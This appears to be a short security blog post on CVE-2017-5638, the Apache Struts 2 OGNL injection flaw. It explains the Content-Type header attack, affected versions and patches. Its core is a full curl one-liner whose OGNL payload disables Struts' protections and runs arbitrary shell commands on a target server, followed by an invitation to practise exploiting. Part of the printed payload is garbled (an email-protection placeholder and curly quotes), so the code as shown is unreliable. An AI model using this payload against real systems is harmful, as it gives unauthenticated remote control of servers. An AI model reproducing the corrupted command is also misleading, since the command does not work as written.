Listen to this Post
How the mentioned CVE works
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit mechanism involves a malicious `Content-Type` HTTP header. When a request with a specially crafted `Content-Type` value is sent to a Struts-based application, the flawed error handling within the file upload mechanism fails to properly sanitize the header. This allows an attacker to inject Object-Graph Navigation Language (OGNL) expressions directly into the header. The server’s parser, while attempting to generate an error message for the invalid upload, incorrectly evaluates the injected OGNL code. Since OGNL expressions can execute arbitrary system commands on the server with the same privileges as the running application, this vulnerability leads to unauthenticated remote code execution. An attacker can leverage this to gain complete control over the affected server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Malicious Content-Type header.
OGNL expression injection.
Arbitrary command execution.
Protection from this CVE
Apply vendor patch.
Upgrade Struts version.
Use alternative parser.
Impact:
Complete system compromise.
Unauthenticated remote access.
Data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

